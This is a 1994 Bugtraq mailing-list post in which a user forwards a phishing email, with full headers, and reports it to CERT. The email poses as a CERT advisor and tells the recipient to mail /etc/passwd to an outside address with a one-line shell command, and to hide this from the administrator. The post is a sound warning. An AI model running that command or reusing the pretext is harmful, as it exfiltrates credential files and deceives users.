[79] in bugtraq
Another request for passwords
daemon@ATHENA.MIT.EDU (Douglas R. Floyd)
Sun Oct 23 03:38:04 1994
From: "Douglas R. Floyd" <dfloyd@paris.eng.utsa.edu>
Date: Sun, 23 Oct 1994 00:54:14 -0500
To: bugtraq@crimelab.com
I got this in the mail today (10-23).
Seems like someone is knocking on io.com now.
(The forward to paris is normal as mail gets forwarded there.)
BEGIN FUNKY MESSAGE --------
>From vanepp@sfu.ca Sun Oct 23 00:00:56 1994
Received: from pentagon.io.com by paris.eng.utsa.edu via SMTP
(931110.SGI/930416.SGI.AUTO)
for dfloyd id AA05240; Sun, 23 Oct 94 00:00:56 -0500
Received: from trance.helix.net
by pentagon.io.com (8.6.5/PERFORMIX-0.9/08-16-92)
id XAA24822; Sat, 22 Oct 1994 23:31:04 -0500
From: vanepp@sfu.ca
Received: from (helix.net [142.231.37.2]) by trance.helix.net
(8.6.9/Trance.helix.net 8.6.9) with SMTP id VAA07859 for
dfloyd@pentagon.io.com; Sat, 22 Oct 1994 21:33:23 -0700
Message-Id: <199410230433.VAA07859@trance.helix.net>
Date: Sat, 22 Oct 1994 14:22:25
To: dfloyd@pentagon.io.com
Subject: Very Important
Status: RO
Dear user,
It is imperative that I attain your /etc/passwd file
immediately. It is for security reasons. You can mail
it to me by typing:
mail vanepp@sfu.ca < /etc/passwd
Do not tell your system administrator. I am
conducting an investigation on your system. Thank you
Your identity will be kept confidential. I guarantee it
Thank you for your cooperation.
Peter Van Epp Technical Systems Operations
CERT Security Advisor
vanepp@sfu.ca
END FUNKY MESSAGE -----
I send cert@cert.org a copy, as well as the admins at io.com.
I know this was posted earlier, but I think this is another address,
possibly an MX record as I could not telnet or finger sfu.ca.
